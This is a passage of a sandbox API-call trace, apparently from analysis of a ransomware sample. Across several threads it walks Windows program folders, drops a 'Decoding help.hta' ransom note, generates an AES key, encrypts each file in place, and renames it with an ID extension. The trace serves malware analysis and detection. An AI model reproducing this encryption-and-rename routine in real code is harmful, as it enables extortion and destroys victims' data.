Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0043.382] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 75 [0043.382] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" [0043.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\decoding help.hta")) returned 0x1 [0043.382] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VC_redist.x86.exe") returned -1 [0043.382] lstrlenW (lpString="VC_redist.x86.exe") returned 17 [0043.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0043.382] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned 75 [0043.382] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpString2="VC_redist.x86.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" [0043.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" [0043.382] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0043.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.383] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x728 [0043.383] CreateFileMappingA (hFile=0x728, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x72c [0043.383] CryptAcquireContextA (in: phProv=0x1859fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1859fcec*=0x3448c70) returned 1 [0043.384] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1859fce8 | out: phKey=0x1859fce8*=0x671c70) returned 1 [0043.384] CryptExportKey (in: hKey=0x671c70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1859fbe4, pdwDataLen=0x1859fce4 | out: pbData=0x1859fbe4*, pdwDataLen=0x1859fce4*=0x2c) returned 1 [0043.384] MapViewOfFile (hFileMappingObject=0x72c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbee20) returned 0x17820000 [0043.403] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1859fbe4*, pdwDataLen=0x1859fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1859fbe4*, pdwDataLen=0x1859fcf8*=0x100) returned 1 [0043.404] CryptEncrypt (in: hKey=0x671c70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x17820000, pdwDataLen=0x1859fce4*=0xbee20, dwBufLen=0xbee20 | out: pbData=0x17820000*, pdwDataLen=0x1859fce4*=0xbee20) returned 1 [0044.377] UnmapViewOfFile (lpBaseAddress=0x17820000) returned 1 [0044.386] CloseHandle (hObject=0x72c) returned 1 [0044.386] CryptDestroyKey (hKey=0x671c70) returned 1 [0044.386] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0044.386] SetFilePointerEx (in: hFile=0x728, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.386] WriteFile (in: hFile=0x728, lpBuffer=0x1859fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1859fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1859fbe4*, lpNumberOfBytesWritten=0x1859fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.387] WriteFile (in: hFile=0x728, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1859fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1859fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.388] CloseHandle (hObject=0x728) returned 1 [0044.398] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.398] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1859fd30 | out: lpFindFileData=0x1859fd30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0044.398] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 378 os_tid = 0xab4 [0043.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x186dfd30 | out: lpFindFileData=0x186dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.337] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x186dfd30 | out: lpFindFileData=0x186dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.337] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.338] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x186dfd30 | out: lpFindFileData=0x186dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0043.338] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0043.338] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0043.338] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0043.338] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" [0043.338] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned 86 [0043.338] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0043.338] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" [0043.338] GlobalMemoryStatus (in: lpBuffer=0x186dfd10 | out: lpBuffer=0x186dfd10) [0043.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11143b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x704 [0043.339] CloseHandle (hObject=0x704) returned 1 [0043.339] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x186dfd30 | out: lpFindFileData=0x186dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.339] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 379 os_tid = 0xaa4 [0043.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*", lpFindFileData=0x1881fd30 | out: lpFindFileData=0x1881fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0043.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.327] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1881fd30 | out: lpFindFileData=0x1881fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.327] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.327] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.327] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1881fd30 | out: lpFindFileData=0x1881fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 1 [0043.327] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*" [0043.327] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*") returned 53 [0043.327] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\Decoding help.hta" [0043.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\accessories\\en-us\\decoding help.hta")) returned 0xffffffff [0043.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\accessories\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x704 [0043.333] WriteFile (in: hFile=0x704, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1881fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1881fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.334] CloseHandle (hObject=0x704) returned 1 [0043.334] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.335] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wordpad.exe.mui") returned -1 [0043.335] lstrlenW (lpString="wordpad.exe.mui") returned 15 [0043.335] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*" [0043.335] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\*.*") returned 53 [0043.335] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\", lpString2="wordpad.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" [0043.335] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" [0043.335] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0043.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" (normalized: "c:\\program files\\windows nt\\accessories\\en-us\\wordpad.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\accessories\\en-us\\wordpad.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0043.335] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x1881fd30 | out: lpFindFileData=0x1881fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 0 [0043.335] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 380 os_tid = 0xab8 [0043.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*", lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0043.332] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.332] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.332] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.332] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 1 [0043.332] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*" [0043.332] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*") returned 58 [0043.332] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\Decoding help.hta" [0043.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\decoding help.hta")) returned 0xffffffff [0043.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0043.342] WriteFile (in: hFile=0x714, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x12f1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x12f1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.343] CloseHandle (hObject=0x714) returned 1 [0043.344] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.344] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextService.dll.mui") returned -1 [0043.344] lstrlenW (lpString="TableTextService.dll.mui") returned 24 [0043.344] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*" [0043.344] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*") returned 58 [0043.344] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\", lpString2="TableTextService.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" [0043.344] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" [0043.344] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0043.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0043.344] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 0 [0043.344] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 381 os_tid = 0xac4 [0043.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*", lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0043.341] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.341] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.341] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.341] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.341] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812936d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812936d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, 